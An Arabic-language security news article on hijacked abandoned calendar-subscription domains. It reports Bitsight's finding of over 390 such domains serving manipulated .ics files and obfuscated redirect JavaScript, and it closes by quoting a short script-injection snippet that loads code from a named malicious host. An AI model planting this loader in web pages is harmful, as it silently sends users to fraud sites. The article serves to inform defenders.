باتت التقاويم الرقمية عنصراً أساسياً في إدارة الجداول الزمنية اليومية سواء على الصعيد الشخصي أو المهني. إذ يشترك المستخدمون غالباً في تقاويم خارجية تتضمن مواعيد الأعياد الرسمية أو جداول المباريات أو المناسبات المجتمعية لضمان تحديث تقاويمهم تلقائياً.
ورغم ما توفره هذه الاشتراكات من سهولة تنظيم، إلا أنها تخلق ارتباطاً دائماً بين جهاز المستخدم وخادم خارجي، ما قد يشكل ثغرة أمنية شديدة الخطورة في حال التخلي عن النطاق المضيف للتقويم وتركه دون تجديد.
ففي حال استحوذ جهات خبيثة على هذه النطاقات المهجورة، فإنها تكون قادرة على استغلال الثقة السابقة التي منحها المستخدم لهذا المصدر، ما يفتح المجال أمام سلسلة من الهجمات التي لا تتطلب أي تفاعل مباشر من الضحية.
الأجهزة تواصل الاتصال تلقائياً بمصادر خبيثة، وهجمات تتجاوز أنظمة الحماية التقليدية
تكمن خطورة هذه الهجمات في أنها تعمل في الخلفية دون تدخل المستخدم، حيث يستمر الجهاز في إرسال طلبات مزامنة إلى نطاق بات خاضعاً لجهة خبيثة، ما يسمح بإدراج روابط تصيد أو برمجيات زائفة تحاكي تنبيهات أمنية أو عروضاً ترويجية.
ولأن هذه الهجمات لا تمر عبر البريد الإلكتروني أو القنوات المعتادة، فإنها غالباً ما تتجاوز مرشحات الحماية التقليدية، مستغلةً الثقة التي يمنحها المستخدم لأدوات التخطيط اليومية الخاصة به.
وقد كشفت شركة Bitsight المختصة بأمن المعلومات هذه الثغرة بعد تحقيق في نطاق مشبوه كان يوزع تقاويم عطلات، لتكتشف وجود شبكة من أكثر من 390 نطاقاً مهجوراً ما زالت تتلقى طلبات مزامنة بشكل يومي.
وأظهرت التحليلات أن هذه النطاقات كانت تتفاعل مع نحو 4 ملايين عنوان IP فريد يومياً، معظمها لأجهزة تعمل بأنظمة iOS وmacOS.
ملفات تقويم مفخخة وأكواد برمجية مخفية تحقن تلقائياً في النظام
تبين أن طلبات المزامنة تتم عبر بروتوكول HTTP وتشير إلى قدرة الجهاز على معالجة ملفات تقاويم من نوع iCalendar. كما تظهر سلسلة User-Agent أن هذه الطلبات صادرة عن خدمة النظام وليس من متصفح المستخدم.
وترسل هذه النطاقات ملفات .ics تحتوي على أحداث قد تم التلاعب بها، فيما تضم البنية التحتية المرافقة أكواد JavaScript معقدة التشفير تحقن ديناميكياً في واجهات النظام بهدف تنفيذ عمليات إعادة توجيه خفية نحو مواقع ضارة.
ويوضح أحد الأمثلة كيفية تحميل شيفرة خبيثة داخل مستندات HTML لتفعيل سلسلة من عمليات التحويل نحو مواقع احتيالية باستخدام الكود التالي:
_0x407c32.src = "https://render.linetowaystrue.com/jRQxhz";
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(_0x407c32, document.currentScript);
}ومن خلال تحليل هذه الأنماط من حركة البيانات وسلوك السكربتات، يمكن للخبراء تطوير أدوات فعالة لاكتشاف هذا النمط الجديد من التهديدات واحتوائه.
